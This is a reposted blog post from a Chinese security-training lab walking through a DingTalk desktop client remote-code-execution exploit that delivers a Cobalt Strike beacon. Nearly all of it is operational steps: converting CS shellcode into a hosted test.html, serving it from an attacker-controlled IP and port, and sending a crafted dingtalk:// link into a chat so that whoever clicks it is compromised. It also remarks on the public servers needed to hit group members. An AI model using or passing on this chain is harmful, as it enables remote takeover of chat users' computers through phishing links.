dingtalk-RCE上线CS
2022-11-22 19:1:31 Author: Ms08067安全实验室(查看原文) 阅读量:43 收藏

本文作者:Taoing(Web漏洞挖掘班讲师)

项目地址https://github.com/crazy0x70/dingtalk-RCE

本次测试环境:

钉钉:DingTalk_v6.3.5.11308701

下载地址:https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe

CS:4.4payload为32位c语言

生成32为c语言格式payload

使用编辑器打开payload,将\x修改为0x,注意使用逗号分隔

替换前

替换后

将替换后的shellcode复制到test.html中的shellcode=new Uint8Array部分,注意去掉开头的逗号

替换前

替换后

使用python开一个web服务,将替换后的test.html放入web文件夹

python3 -m http.server 80

将poc发送至聊天窗口

dingtalk://dingtalkclient/page/link?url=ip:port/test.html&pc_slide=true

点击poc即可上线,发到群里别人点需要cs和web服务部署到公网,同时非安全版本钉钉才能上线

—  实验室旗下直播培训课程  —


来和20000+位同学加入MS08067一起学习吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247504439&idx=1&sn=6b448eeaace310d9c8c6d0d4a976ef62&chksm=fc3c6b36cb4be22067c58dbc51c0aa126ae8f498dce48b45c07afafb8d960cb213b66ed97e3d#rd
如有侵权请联系:admin#unsafe.sh